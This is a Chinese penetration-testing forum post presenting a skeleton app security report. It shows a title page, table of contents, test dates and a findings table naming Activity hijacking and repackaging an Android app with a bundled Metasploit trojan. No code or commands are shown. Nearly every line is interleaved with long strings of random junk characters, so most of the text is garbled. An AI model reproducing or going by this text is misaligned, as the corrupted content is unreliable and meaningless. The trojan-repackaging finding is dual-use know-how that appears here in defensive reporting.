找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4029|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 w+ ?: U3 T* o0 C" C4 S 7 w2 k. L7 d) s2 F7 Q

& K2 d8 Z* p" \2 e7 ]% n; K) s 7 U5 z4 Z& i5 m. G9 D
; M3 Y3 g- D \1 r ( @% Y: B) M; u8 p$ ~# Z0 L

2 Y# z; K$ y6 n+ u 6 {! L4 x7 b; }2 {8 ]
+ w' E' @, U0 `0 O7 j) ` / f! T+ k% C9 E6 T1 h% _' }

0 R0 i5 G) j5 p * {* z# m7 b+ ?" f' b7 u 文档编号:                6 a6 M8 Q' |( o5 K% ^4 C* P / U0 c4 _% V& o9 |; a0 x

% r' N+ y! w& d& A) i1 C , e5 k+ l3 I! q* w7 V

) u6 k) p0 U- C% k2 B) Q9 C6 D6 e. l+ g9 w) i   3 Q) i# V- A& V2 v) _0 I, W % p+ ^4 k# X1 @- h+ ~

8 e" R6 ]' Q" f, g; D. D; Q ' e7 v* f9 @- ?* ^% c

( J8 q* D$ I3 [0 r5 g$ D: @& x" j B3 h) Y   $ d' R8 k2 {8 m7 j+ I0 {5 U$ Z* y" A: V6 ^ I. r

4 P: n7 r5 {0 ^) V4 X: x; ?% c 1 O! v! x ?" w* n/ A8 @- M9 f

* ^+ ~' k6 {8 o: Y- g6 E : ?4 |+ Y- r% L9 v( {   1 }2 E7 u" b3 t: |0 d p0 m" B$ R( O0 z3 N" X

" I1 z" T% Z, ~# A' r. J$ ~$ |1 R- o/ p5 H, e; o% H8 [# z

O9 |; }% _! @2 e) X + }+ {$ x% u' t# P( I3 Z   7 R p- Q7 g" r/ d; j: W1 A' L9 x' t# Q# O, F/ Q7 `+ j7 d

4 y, f6 J7 L) N- A 4 y2 G: _2 |1 }, x

& e# `6 h9 s1 \5 U " E8 a' B1 d# t( ~- o2 o. ~4 p/ p/ q   . d0 h5 _8 n! W6 }- F8 \! Q" O( f) n1 v z6 H J9 x# t

( }. K p! g3 l, Z3 l+ z ' @& r" q& L; A- j" H- K: E7 i) z

8 | C' U; Y$ Z5 b 6 \" z# f# G8 P$ E0 } 某某某APP渗透测试 # I1 q- c% K _- }5 L9 [ - A9 n1 t7 t: A# X6 b

0 z4 U1 D% p _- V0 ^: P 3 C5 E$ B- ^* }6 M! M" A0 F/ ~/ w

3 v. g5 |5 k3 x5 w/ H, s8 H3 F! R . K% I9 Q, e/ _4 n   9 ]' w& ]# C K; P: C 1 W& l" I3 ?2 N

* b2 A/ a% a4 g# S ; \2 d3 }5 G4 {8 n% L. b( C. ]; R

, d1 G8 o, x" s* V- H . ~9 C1 x+ @- O9 Q& x   : V% Q, s2 @) r7 V* u$ z* x) r5 B! o& w% o

$ _/ U" H! n$ l) m' m / A9 m% G8 v& I" d5 Y# E1 t9 O* u

9 m, Z0 H2 Z7 j, D$ U S! M: {9 q+ D$ `   6 w: k$ w2 W0 A6 V8 ~7 E! G 2 ]- x# q+ w0 A8 W

: e) P" b! z& |! } 6 F. I* q9 e( a, R* N: r$ F

( Q7 Q7 {4 [- N: D2 E % ]6 }3 r! c% a5 f" H   , d+ s2 i8 x3 h0 [5 u1 c q: b ! P* k9 _ d) m/ D0 z1 |* L) O. U

2 e! l6 g, `5 Q. t }9 k/ V1 M0 d) W" k8 @

' P6 ]% S8 A( H5 l+ g O7 u* H8 \& H( y9 u0 N" v 技 术 报 告 # Z* h T3 @9 w' M 8 Q* ~* N- X) B

* t6 e- S3 ?; s. G4 P8 f + X* {7 S2 q- ~

0 b8 Z' B4 z0 x; _6 E2 f4 v( |$ f6 W3 [9 x8 \9 r   5 M: M/ _* `8 S1 j7 H 1 u% N# T9 E; Z+ `

$ N, @8 D8 J, ~: \* w! l7 z" y: T# t/ P' I3 `; C

! _8 J, l: X! l T. E% n/ q( K2 X! @0 W* s; ?& D   C; o6 w* r+ U: i' n+ h# R" N& O- w. r

g4 O3 ` b! f: v# Y2 u; ^8 z/ j2 S- @* G, ~& |

/ e! o" f: { L' E' ]- P # ]6 v0 h r1 q$ @/ o   # n6 v) F# \1 T4 r 8 C" {% V3 X6 |9 ~: P5 E4 M

. z$ F& G7 M0 n: L8 P h % p* ]* B# F O1 z# t1 _

$ o* X" W1 `9 a- `) i8 a, U6 b' z0 N* F( T& e" w9 t* F+ `) Y, p   , m9 w9 E- k1 o* E. A. `* r; c3 u6 ]) }( q

, C- c5 X7 F: R0 H6 a5 |! M: W5 M2 _! I% }* |

' y" \# ^2 i9 R2 v( F, B8 H* H8 _3 {   6 x: P; g2 @/ H; N7 S 4 n) Y# |; c% d

$ `6 [. {% F ^; A3 K4 p/ C : \: w# r1 @: E1 e" D

$ O8 ~* b+ J# \- }7 g ( S2 ?; V% Z, [- W9 A( H+ Z   " c; W' t4 n4 l $ m6 h) ?6 O6 p0 \$ N4 ]

' B* ~3 V% `' T8 ~% N- P7 z" \5 P* r

$ l! G: l2 _/ u. B2 S 6 j4 a5 b6 l+ ?% _& ?: N- H   ' |1 s7 O1 j, _( }4 g5 C } % v) y- \% I- n8 H

, U( Q/ p; k" S% _ 6 }2 }' Y- Y+ G# H( D

; e9 B/ w6 h% i! L G7 t$ k$ ` ' f) H+ u% Y; u$ p   , F8 I) w1 m" ~. {6 u# {7 \ . }7 H0 K r1 J F% l& m; _- S0 Q

8 o- }0 _$ x* ?% a ?2 q$ F2 `6 d" p' k0 C

2 W4 L4 m% N+ H. D1 h 0 x7 U+ c1 M0 i5 x4 ~2 G: u$ t6 I   + Q: K" _9 O2 y " E8 m+ }" g: c- I' |4 J1 e+ ^

- ?& O5 A- }: ~3 x; _3 N8 A + q8 @. N$ i- _9 R4 t8 w7 z

# v! X- V C1 s$ X) b ( O% F6 u! `& h K3 A9 t7 d' v) L/ d   , y! t3 m& z5 _9 _" L2 O6 ? l" K" s; A. h0 h! A C0 C+ L

( Y; A6 w5 N7 v! y# h1 \ 7 H0 k7 s9 N/ Z7 {( k

% a& N! K U I. H/ ~, }; a# W6 D, ]. y, e6 _   * g9 ~' [/ K7 Z h& j" [' I* B 5 j9 u6 g" f* _

/ a4 E. I1 j1 f* H4 J2 k+ p8 E+ h' y: z, U( Z( U

2 Y6 O( F% _5 w9 u& W1 e ( F$ J% t5 h, `7 n: b8 I) X# p   ' z F5 u) I' J0 _8 o4 [0 \( G' y2 m+ A" W: V" V5 ?

3 S$ Y- |+ a, a ; [8 U$ E& K% l1 g9 o

& o2 O6 h7 o+ Z U3 t+ q$ B& G0 W; E( t   # Y" X# M) g1 F0 ?( o6 w0 C6 Z. E1 a8 \; L" S1 b

: n9 K i3 B& ^ i" D( j + I2 |4 o7 j, u3 R. L0 M9 f' ]

" B9 g4 ? ^& z 3 O7 d, n( i* v3 q- b   % Y/ ?% d! f% ~' F4 Q " V" \) \6 o; D

% a, R+ M" u8 v ! R& i. e( v3 J5 o8 B

& }6 J0 j& y; G; r& w# l " a' M, p) k. I- W8 H4 g" c   ; N9 Q6 |& z* ~& M: j/ d! ~; V" y- k2 \

. |# y- M' K+ g : C+ l; h4 S" R1 w* z

3 \6 O2 K6 N: a: Q0 i" x! \, ~. U0 T3 Y" ?4 Z2 {   5 V8 F4 t2 v1 [ " `' J" z! F2 N+ @0 {7 y% L7 _* J( v' \

2 G9 R/ q$ m8 v7 f x+ e) z + z, ]. P7 T3 O1 ?: g

$ C/ J, G: r4 L, v ^, H; G. L 5 v( Y) K0 R; O" V   1 @& _# Y$ w3 A! u8 u * s1 n' m% x9 S% i5 s1 t9 s% L

/ A% I5 {# ^1 Y. K 4 v5 ]5 }+ O# n1 o

; S7 Y3 f. r7 G% @' \+ O6 u: W0 K: q   - ]+ j( a! T$ ]/ P 7 O i+ S4 P. ^

2 M" ?6 t5 L( s' M: W, @9 q/ U 5 T5 q5 j& e* \/ |, ?

; v5 ~. p2 l2 [2 [' Y- v5 ~* v% i1 @1 M& b0 b: G 二〇二〇年 , h' u0 I5 F+ j2 p6 U. e7 p- \0 \/ D) _3 h4 O

3 \0 M/ ^# V ~- S$ I. n% K4 S 5 l. V: I6 s# v! | ^6 v7 O B
# x+ \9 M+ j+ X. S$ e7 R 7 }8 s5 ]8 l# _4 ^4 E1 D
1 \( |* N! f2 v! j 9 V5 _' a5 i3 p! X7 H. s- Y: v( L 4 G1 b- V: X$ K: H) s9 n" O: M ; D1 h$ g$ a! T8 J# w- n1 t/ `
' }: J) H- d& i$ h' f. a: e 0 S( a& i7 S; `7 R" O3 B d
9 h* E5 E9 v: y/ p! T , O& D. k8 w9 G4 D
6 h+ E! i: N/ h2 J* s# F7 o7 G5 d3 U6 h4 }1 b% ]- O + K- x6 y/ o2 ], K- ^0 J6 Q2 E. f, C$ U
/ b' S1 |* \# t7 s9 M 5 @. V/ Q' c5 \0 q& r

' @& A" d A) y2 S0 w7 W: [ * H% c& ` b( {% q @/ A 目 录 , |* Y& @) g! w" b * `; }" _& L f, c1 |

# g4 W' K) S- s ' I# @/ G3 F5 s4 g6 Y4 l% N ; N7 x' q. h0 K) A$ U ) p6 u8 F- N( @7 [( M9 o3 ?; [

" }3 X' X; Y, D) d* O6 p$ [1 z" [ 4 B% @/ e1 j% n6 S: u   + J; |: S/ X) } # Q: X. V; {7 v9 `# R0 l5 y

# z8 c7 V5 Q- |2 m1 N5 v 3 Q$ a3 u& k! W+ `/ U

5 Y" W% P$ D" m5 O/ z# q% ?3 } ( B1 Y/ `8 }; `) y 1 概述... 3 6 L' p4 d: l3 N/ `( u8 C/ R 9 ~6 a: q8 g; O$ G" A: f

: m4 X, _ C3 F9 l. B ( ]% s) M3 R4 q& H$ L- E/ L8 r: ?

S! J- V9 F6 ]( k % u/ D, A5 B' R9 j/ r 1.2测试时间... 3 # X+ h) m I0 P' {1 } " o0 }+ }1 p" w: Z3 h$ f- C, g @3 ]

# r# \" {1 k$ O* R1 i# I# O- @2 Q. w$ V! Z/ C! b9 O: Q

7 h: X# ^' Q L* c) V+ ~ ( a# C: L# F1 G/ h9 p/ B 1.3测试对象... 3 2 R# s, S$ j* R: Y" z 8 f0 K! g$ ^! t! Q, T& n3 r

: `0 |, ?+ S% G! h" G& [' d. i' t7 R( W( O5 p

" b0 E6 R: q- H X5 K! ^) l3 O8 G" A# E$ s% o9 q( z 1.4测试结果... 3 ) T+ P, d G3 \. Y& r/ U9 o5 k 4 h( f2 O) \$ _5 b% |

1 q/ H0 Q; y5 T7 A2 `; T, }0 ^- D2 e2 a. i) l

6 H8 ~$ \: S& B4 i+ n/ Y1 l " W& }/ |9 [0 \% \$ U+ ` 2 检测结果... 4 2 Z# i3 u5 r e0 k8 `8 X5 ~& p2 n/ u6 @9 z: I% A6 U. g, F

1 \- m7 x- L- {4 q7 n ) D* s% L, ] t% s; Q3 B$ c

) X$ ]6 A) d2 @& p- T 1 ]8 b5 {# b ? 2.1 某某某... 4 ( t/ }5 Z8 ~( w( v$ X% a$ A2 u) |3 V # P% P! }7 v" n* d0 [, p

* k* z1 D4 k" a" S6 V9 v9 p. H & R+ u' z8 f6 C' ~& @( V

# k* m7 y# y1 x$ c/ R( ^6 U3 \8 }- M4 z1 \1 K6 U } 2.1.1检测目标... 4 , F! T8 w5 e4 t' t , ?/ P3 B& o3 p

' y/ n' u" w' g' h/ p" @7 Y) J * K" ^' _$ b' H% k* [

. s/ @( L5 ?5 N2 y 5 K- X$ P$ X1 n5 Q L4 U 2.1.2检测结果... 4 9 n6 r q. i$ G# ^ 1 u$ j; E, ^. T( d# b- u* l; v

5 e4 w5 M8 i' e5 @- v+ t" F$ T' }" H5 A5 L( o8 [$ l, Q h, m

6 | P# [$ _& ~8 z8 V/ d3 P . F' t M3 i# s5 A. u6 @/ g! A 2.1.2.1. 4 6 W, B1 O/ r- K$ _. o7 A0 q0 E4 p+ \% |4 R" P1 d) k" o* q" h

1 L* F2 L1 T( T! G e8 m ) a9 Y: u( {6 g4 ?/ X& g

1 k5 D0 z' J, @( ?) K 0 N1 o1 `# F( N* Q1 _& T: _; X 2.1.2.2. 6 ) F2 w' L3 ?/ L& V1 j8 d& x5 U" h2 H# Q7 S

, I4 l9 _/ b3 { ^% D% J! g # X" y% \3 E9 r- \& I

3 T" {0 G; n8 y: E* Q7 h2 A+ q d/ N3 ^/ I- ` % m1 x" L$ u- q8 o1 {+ Q' c# I3 L- j R0 r8 _6 ~3 a/ M7 M

6 f. t7 K, M4 ~) o v( Q" x; j' ^# q- {4 y4 q6 v1 L0 O" c ' {! ]/ F' D9 s3 Y ; j* W* a& R: G& w; G
9 P2 \# o7 Y1 t9 @! ~- K& [ ; f9 k1 v4 g# B; b/ t8 Z
& w# u% u* [" p. v. C) i: o ' `5 R4 ]- l0 w8 q2 `! M 1 \6 b5 Q( f" d & I4 J( \3 f# i! P

- k T/ e) ]! }3 l3 f/ }0 S, G# P+ `) F2 \5 ^$ S 1 概述 9 }- g: ^& w! |7 C, `7 Y: a, |* G1 r- t, `: D& Y+ b2 D

' O4 q r# s( M3 q2 E% K2 M+ M ' X4 I6 q" C$ Q- o

& n( D( ~' C- P8 [# K+ _, m W9 a + F; j) t3 ~, d- Q8 a 1.2测试时间 1 [1 F, }7 [, }' F- |4 v; s+ v) }0 h8 p# a6 A& I) d

1 P7 ~% q& a6 @9 ~9 ?& q! E 4 z K. V4 F) s+ W) w $ ^. T! O- x& `% I' Y$ ^7 e* Z8 j$ s$ K8 d4 C1 Z$ y2 o/ x( I8 x8 W" p, M+ y0 S! w6 E3 F& C! O" N& {+ l4 i. i% ~+ ?, j0 X" F' R: M" v+ M' H8 z0 F# ~9 `3 ?$ Z" d+ F9 O: ]+ R& j. z& X+ G. V6 g( b1 R! \) A1 i$ m, _1 ~5 i4 h/ N, R$ k4 O+ V# _& l, @2 ~, u' H, i; F$ |$ E0 Q6 W! ^$ i `$ u l( @, Q( r- Z3 Q" r% o8 ]0 p. C& X. x8 ~" P6 Q, C5 g& n' I% x0 d( @8 s# Y6 J6 u: V$ ?* `: w; w" K4 e/ T A" X. r3 J, d0 d5 U/ y4 n3 w$ ]( O; D# C) o; c$ C3 }; K! R4 x L0 j+ z' L6 [% G7 ^: G8 v0 u' B1 P; U/ s5 O4 i" ` i1 V; x) k& ?+ w+ J+ E2 t) E) f5 P5 v1 y5 o- h9 z- n) s' U- H# ]$ \9 Z3 U$ W: U$ o: T: h/ r: y3 L% r( e, S# ^: n( S5 I- F7 G
' k4 ]9 q) I1 q4 k6 U7 H% k. I- u 0 G$ v1 `; y4 j/ c

2 g5 Q( L; T+ y- x& `; a' a( K' J0 ]) N' x4 ^" y# k! B' q 渗透测试时间 3 P/ s9 b+ m# g7 E8 z9 w0 h5 h9 w! V

8 ^9 @# U5 Q; X A: d; d" {# O ' M" o b* c6 {$ O) q
$ z5 \3 |) X! e: W ) S+ g6 h; v4 T/ \) E

4 w1 }& O) M9 `% P . t6 `+ a2 o: l7 S! ` C- P8 E& J8 y 起始时间 5 X! Z. ^! o: t0 r ; `' q, U: t! R0 k4 |! P/ ~5 w7 U9 Q

! C, ]$ H1 x# c2 S6 n5 X 3 u% i! _; M* b. @ 		, O# C0 r) @+ z: j; ] - W7 \8 v# S* [* W. v! w# O5 V1 ^

0 c8 [6 P) |% R q $ J) f9 C7 g! s' S 202046 C1 W$ V( c0 q0 G# A3 q! Q : }( h/ F4 f2 o& l

& }% f* s: T, @% \2 R- n2 p8 G5 [7 P% E+ b3 h+ I
/ A* o- H: v3 _: i* a ( z; s9 o- j3 O5 f5 B+ M" ^1 g

- n! M& L! d3 E8 ~/ b : }. }' v1 W( \; T6 ] 结束时间 * B$ m3 P: y1 H" D, N$ d+ {: t) e% y1 Q

; ?0 ~& g& L. _- f - t2 D6 K9 I" s9 T 		" d6 X0 h) N1 U' F1 a. j' X& B9 L, y z9 r5 @& @* ?

% k: {. {/ g6 P& N: w6 J/ J2 Y! x6 k3 A6 z 202049 1 c S9 R$ U: m2 n : l8 a, `' ^. m- r: d- J* P

. o- j5 x6 c6 W& j* g- B2 t6 l * h$ z( N- I" a/ x9 Q1 o. o' E) `
1 I) `8 t! U* s2 g$ A; F) V" j6 [1 A: |

4 s( S5 k" O0 S C8 n- ^ 2 y! V) S0 w' e1 o' J: p 1.3测试对象 : S" ] r) N+ r 6 u3 g- z7 V+ M- E6 W

$ P% f0 p. G8 Y m3 @! ~0 z # c3 ~8 w' ~; I y. \

' j3 W" O4 d3 \% ~3 E6 W2 e 0 d( M, l8 `' f* D1 d. T' j+ S 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 7 s! Q- \8 }7 K3 F8 r i- G) {) ]9 H/ @* Y

( ~4 Q, N t; C( W' z8 B % H, S' X! o5 o4 o5 l

6 J; B2 D' O7 t$ \% O; d5 o/ C: } 5 X. D2 X$ Q0 `% E 1-1 检测对象 ( k' P) M# _$ X1 q6 |4 N# n8 d0 a/ d) r( Y7 ~' S0 b, A( z

% d6 g6 g7 \4 ? 8 Q# r: U' c- i5 ]2 J ' E% U$ I/ Z: K! M: q* c6 K) ?1 j& j$ \/ U) O4 r! g& R# G. C% B6 \$ k& B" w$ n+ w. L) P! H7 T8 j" {" A/ s! u' H! ~! _6 G1 [/ I1 |( I% ~9 v! O3 U( m" p8 p3 T: H7 d# W6 x5 c% |! K! t9 Z% `2 Z7 c9 |0 T, n8 f- J3 S- t* S# k4 w4 F) F. c, z- k$ s# L r; \. [3 \& [* B6 z. r- S6 ?' e( B2 u- z- o7 a% I9 G3 g+ z) t; e. q1 z% s3 S2 O- o( w4 v" l0 t3 @5 s: p$ z$ m- e. [/ A; T0 V/ m( t2 j0 k2 z F4 E; t* H9 ?( }/ c* `4 N6 i; x* ~- g$ J9 U" c5 u5 @( h8 ^( J- e: U, x+ Z1 {1 c/ \1 H8 f3 Q& D9 f- n+ y6 V0 W1 O+ w8 f! M) ^1 ^# k) M6 E( J. k- n' l! X1 ?: P4 q: _1 ^9 Q& y" x' \* W, R* x* j$ {( d) k2 T4 e4 v* f+ ^ o1 F( c, F% d/ S1 o6 }. q1 k2 ]; s" ~# K$ e8 a. f( ?& D% D" S$ z- r# L& y/ ?0 [, F/ ?$ R( Z6 ^0 u; r- c6 F
2 I4 f6 h) ~& W& ~" k% `7 l y* T $ u2 {; G* C# a, y0 n" m5 ~) o

/ ^' B2 i, O; M* _2 E' Y$ i7 K9 Y . X( M+ T, T& D 序号 * f& i( J$ v; q6 o' D; G; o8 P6 M 9 p6 x. B4 }1 g

9 K4 w, H0 w' N8 s0 F- W3 O* T' ^' o 		4 R5 V" ~8 Q# W% p5 k9 p: F, _/ ]; r8 q ?- M( u; D+ q# X! K; Q$ a

! @' p: h2 H4 J * j& L. f( x, Y# r2 d- n 测试对象 % [, _" ~( m3 i) f7 T; \ 5 h0 L( `( L$ u5 j- P

, G7 j, J _2 F1 Q0 F9 m- @: Y0 C, P/ z 		& l/ l/ e( A& P5 P, P + _7 ?$ q% T3 q$ N. u8 C

9 q5 h% z0 c" c% c, B / c* E5 v: {* ]' B' J" Q" L 测试地址 7 P( e0 e$ c, v/ |& }: a , L0 s! N, C4 A- g

; B: @+ s5 J( x% ]0 G( f& t k3 n+ L, P# H& h" u9 L 		, l8 G4 Z, ~+ o9 H' b: J1 F2 W2 l) Z; b L) N- j1 X

; e8 k4 j7 M$ O" C/ `: T1 ` 0 p1 s9 Q+ D% ` 安全漏洞 . ^9 Q4 H0 |5 ]: b' \4 Z1 u6 D+ s. G8 r% I& v* p m/ b9 W

- \: `2 |: d% S& g) ^/ T+ \& Y1 L
6 y0 N% X% N1 D# l/ F , A; g* v/ J) H* s% q6 X/ e

: x& o$ @) K1 z 8 |$ f: D3 s, x- ?6 o& B/ Z 1 : ?* Z9 v, A3 D. k) K+ R ! x z: @4 g, u

5 F' Y& O; P4 o1 j % K( a- J; o- P3 r: Z6 j 		: C$ S" z1 V$ `1 h3 G 3 g0 i7 e% T) d' ^! n! W7 @7 k$ q

+ |- V* I. C- Q3 L- Z' U: q) O; _+ Z i" H( o8 }2 _ 某某某安卓APP - m' x- S% [+ D; H* s: _9 H7 P 4 P4 T% D5 u( M5 l" u! ]- L/ p6 \

, z, F& _- F% Z1 L# p @- N# q3 \1 w# V/ h4 j9 `8 j' u 		4 t7 s4 P$ }: y4 g+ v/ d. k" @4 n' i6 P

6 Z8 z/ Z! [1 ]' \) y + b: ]/ ]- @' L& o2 `   5 h- y5 W5 m3 i+ p+ O4 r; l: H2 F& z2 _1 {

% @4 C) b( L2 h/ j1 l C/ e* X( X- W/ [. H3 g& m* D 		/ d' S, m1 ?4 {$ F, Z/ `8 [ 6 }: F$ N% M) P5 U- f5 h2 U

& s+ S$ o( {; r1 U0 { ; z, z1 u1 ~& a2 u0 h6 i( }* l 2 4 F9 i4 Y+ v8 m# T' F" U. N) o" q& `1 J

. L- i- n- H+ v: a( N% H$ ^1 ?" q9 G7 A9 `8 N
9 m0 }( [5 W( E6 \# u) | % N' N/ R% C9 T

/ r3 q+ L5 d# m9 U" L' y: k# d$ y1 q3 M2 L v 1.4测试结果 2 }/ D- s6 p) Z' N 4 f Z' k' f( u: ]# {8 N! |

1 m$ z! ^# R1 l( u$ J2 ]1 D & M( J0 n4 Z, s$ l( t8 V

8 Z* J$ ^3 D; ~/ B 3 G* q3 x+ S; \5 A 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 6 v1 f& Y6 N/ f, }! a1 G$ [, i * ~* c. S" n8 K. D

3 R3 ^' D" `, M# ~6 X . X$ G, \0 i1 L, j) w* |

6 D5 h" t( X+ S; t0 ?3 H! n+ e! c2 G% p) T: @) ?   / m/ y% w4 l: l g 2 n2 Q( K; Q+ T

4 _5 v( B2 n' v# k" ] 1 a9 T) s/ d+ S, j q
3 L) n7 `( q8 i9 {! H7 J* P6 d9 y6 Y4 m# S4 a8 w' j( H - n" W+ b, {! E: v5 D3 o8 A: w, d! q( R! [; C. @% [) s R0 x8 M8 ^0 S" ^* D; x6 P! H3 c d' b0 y2 s" a) X& n! F$ {6 a0 `$ A# v0 o! K) Z% B4 K; r# u, J8 K4 I' I' W+ \; u6 m O0 z( t3 c7 N( }/ A6 u0 n. g. a+ ~+ a2 U* Z& x4 ~. N; x$ y: e3 t" i7 q) L; }$ A! W Y( s: a1 K( e: U; G) F& w# i& U$ u" t" t. n$ ` [5 w# W) e& P5 Y6 V( y7 m' ?3 E+ `1 V" i" t2 { F& a8 ~9 H: ~( u1 @, x- L& T& l7 X( C3 E8 M% O c2 t3 r; p& I) g& j5 m2 s9 ]! @1 D, _4 j* O- b+ U. l% K. C7 ], n6 t3 Y# q2 _: m' |4 G+ z+ _3 m+ H; \) s' f2 A, R" o7 n0 T' [$ y- e) L$ p& {0 l P- S2 Q5 K- ? X8 w) v; _0 p' [; i0 s" }# D- p: G/ q! U6 |& H/ p/ Z `$ e/ d& j; r+ u# @' d/ t L5 \& z: k( r8 |( U* V! k( Q1 l7 Q! g* B" g8 C! i0 o1 A! T+ l+ n3 o- a) e3 n/ _8 z% ], R8 t+ B; C& ]3 b$ o$ T( P; w' n4 v K: o1 R7 j5 u3 N1 B2 T8 ^; }+ l0 s# t$ g" c% n: y6 a: r- E4 Y$ d# \; c1 n7 F% ^" J; [) `$ X5 P, W! |' c+ C# n" ], R e. T; J8 v; G4 _" ]- c# p" o2 \" ^9 Z) f" ~- h) a7 L& K: n3 ^" }1 F* h8 h7 @5 I+ ?% x# v! y, y8 y, A# Q2 M$ j# \7 e" I( S+ b/ |. b& A' b6 ]/ s- l/ z' Q# ~# M# i5 s1 D9 Q* }! Y5 U6 _9 s( v( X) w' ]- |- I7 z. W6 B% _( Y+ D; m7 I
6 }6 [ I- a" X5 w7 }8 T2 q- W4 R D$ _6 E6 u5 r* L

9 H Z d- I: D9 @3 M7 \ 5 X/ x0 l. P1 Z2 T9 _ 序号 2 D; H! V: y( K" ]) o8 b % }3 h6 x3 s3 A# G

. H* A8 i/ l/ J , U5 x6 }2 q5 D. K; H3 J6 b. S 		6 I0 X2 x# U# ] : a- W& F5 ^7 i

; @1 u9 [' j2 W* @ 1 X4 b& j% Y+ m 系统名称 7 A$ z0 R: O5 m4 D& I( g/ X% W9 f2 a

5 Y, r* P& m) Y* A, Q9 E7 s* J: ~/ ^, F! C 		$ g% o+ U! t/ z, Y3 T( J D& A/ \6 ?: I) m5 U: X/ c1 D) E; G

( R3 u( B! x, d3 \" N* \: m , s) R2 d8 S' H' D: F- z, B0 t 漏洞名称 & O* Q5 ?3 c$ c+ r. B3 ~ 1 p& f7 _& k- f) {0 v0 b @0 T! b: n

+ r9 |! x- Y/ p o! `' }: V2 O/ F' r5 W 1 h; b5 B' z8 b: D1 i3 D" [ 		; P" ^2 i% |. W# q. h& J2 q: N3 A+ n4 N; }# v% i$ V P% j

& [8 { a. f1 ^% ~3 { + i C8 |& }; l; M ?7 ~ 漏洞危害 # I5 o' x" R0 k% e) y ; v7 d+ }, w" _) K/ Z" f

! Y- p8 O2 k% v3 b1 i5 V3 o 6 S4 r2 T$ w, ]6 X5 j' I" t* s2 l 		5 F" @6 S9 p% t" \5 C2 U# x; @7 ?7 l# N$ n9 H

6 q* F- F0 N# x & c, A6 ~1 B+ Z8 r0 w 修复结果 4 _8 C8 A* N J0 E 5 u& w- a. r1 V1 e) A4 @

y/ |. d- U- B& e9 E# j7 \. R! g( O8 r& Z0 Y
$ Y! P/ X0 L: o1 c) Q2 a- @, F7 S 5 @7 b6 O; C: J: H% K/ s. Z& i

2 B4 K! j+ |4 [4 l, S3 k3 O & a' j, D5 Q: t9 {( o& M 1 . G1 A& i* Z5 \" r. ^ N4 ]2 f. \/ k* |* S& {

/ f5 I' ~$ V7 \6 b& g7 l, ] + p" l! e3 _+ [/ V- M 		' v7 @+ N8 J: | ( f1 n3 \$ n$ m! d

$ f. k* d& M0 r j1 u / T$ o6 H7 |. @ 某某某某某某APP : {7 p# Q0 m, y y0 G. O ( Q% C' l7 j: S

7 q8 A K! Z/ ~$ n$ B9 T9 |8 U3 _. h# P L+ T 		' e# x- `6 K9 |) K4 F# C6 \1 z( { 0 T! ?% M. h' U) L; [0 C

$ z3 y. U/ P# l6 b 1 O0 q# `$ l2 `! b" d Activity 劫持 2 [9 E1 ~' Y3 @3 l9 S( I# a0 H( C8 k6 _! E& n+ M7 A$ z

. L# ~2 ^, }& b ; v4 K' r5 w; G* p7 r

4 V5 H+ }0 j7 f) G 3 g6 T! O1 q! z. b: R! ?0 k   # n$ T8 s8 n% B7 Y$ s$ E& A3 \0 @: P9 U+ M3 p4 u

7 |5 o0 ^; q# B T/ z$ b+ U- O+ e( e. M' z, q7 N! U5 \ 		. @! F" n7 e! [9 D* J 7 `; X& D- e& M+ G" Q+ K

. R9 K5 f; _& w- o+ @$ w- Q) u2 W2 j6 n, h! J & e8 j! \/ W: z! j0 Q/ [% z& s! y# K* |. r+ J

/ d) {/ S& O4 O; g4 m) ]' W & S K* E- @. v 		, A$ H" W: z/ u+ M; O8 o9 X6 R) ^ O0 l

' H2 W) l, T: [4 R t8 d' t) N- @- Q4 @* C   . w% G7 w8 ~" G& C 2 R2 f: O8 ]6 s

) V. ~5 j* ^; e+ q! f8 ?( @( c. p* l/ X" b1 {& P
' Z5 K D8 C+ x# s% G * H- j- a/ K) ~3 U# h

1 h8 W$ E1 m: D& Y M9 x: R & ?* n: ]" @- |% r2 l8 N 2 % _# D& B- N$ f ( R' G7 o4 q: r" M" \3 n

7 }" }- D; |- j! I5 { ( O1 \5 k- P9 {! _$ j. O/ X9 } 		7 E$ T' \: M- } 0 F2 J7 E/ z4 m& }

! p9 e1 ~, G0 ]) T; U 0 H; n* F, j( s# j 某某某某某某APP ) I) a) [1 ]; u5 v) u6 p* {* k3 v . Y, t2 L4 o2 S

& N, _# I* G* `( ]5 { 5 X7 B; k" Y# w/ Q: A* c/ D% l 		3 }' W O( U0 [ " K. _% b5 @; ^, _4 j7 P2 \$ F! U

9 i1 H% S/ B! c' J) L" ?" }" H2 v+ t6 w" F 反编译二次打包捆绑木马、篡改APP代码 0 g9 j, A& l8 O7 m a4 B9 W! N: b Z' u, S* X

% _7 Y, D4 N2 u5 Y& Z, c- ` 6 |8 |8 T/ w( @, Q/ _4 P) D* C 		! T+ G$ d$ v/ |- H # G) i F4 v$ P, g3 N/ [. ~- Y0 X! u. r

4 {3 e# l) L. x3 M( R2 a/ {9 H/ g( K" m& X. e" \' H a# O0 a( B$ L ( j" q* S c+ A2 u8 j) h0 n) W

8 e4 g" @- R* R: Z8 c+ `3 ~& B# u % X1 E4 ?8 B$ o2 }9 ` 		8 Y {8 Q' d/ R7 D) F! q5 K X" g* f' O H

U% X3 G- N+ a+ i& i, L6 u 9 N( q2 S' c4 ?/ m   0 }' F2 G# W3 y. x4 d" \6 _- O ! i4 |; |8 y% O% N* G* Y) X

( Z+ n) j* ~9 \! p `5 w 8 g5 \6 ~$ f4 V
7 a$ K g' t" U/ [% x( R+ e: G , `- S) S1 Q: p! J; u; B
& Y9 b+ y3 R1 [" R0 y1 v0 s2 A- A$ _, F3 g- U0 e7 _$ g# K$ ]

6 g- R# T: |0 a 0 U/ z( `: s( X   " b* Z# {/ L5 a: f. x0 r. a $ Y1 G& A1 n4 E. E$ A

6 O* V1 |1 ^, ^9 F& W 6 d8 k* R8 R4 J4 L0 I7 O# V

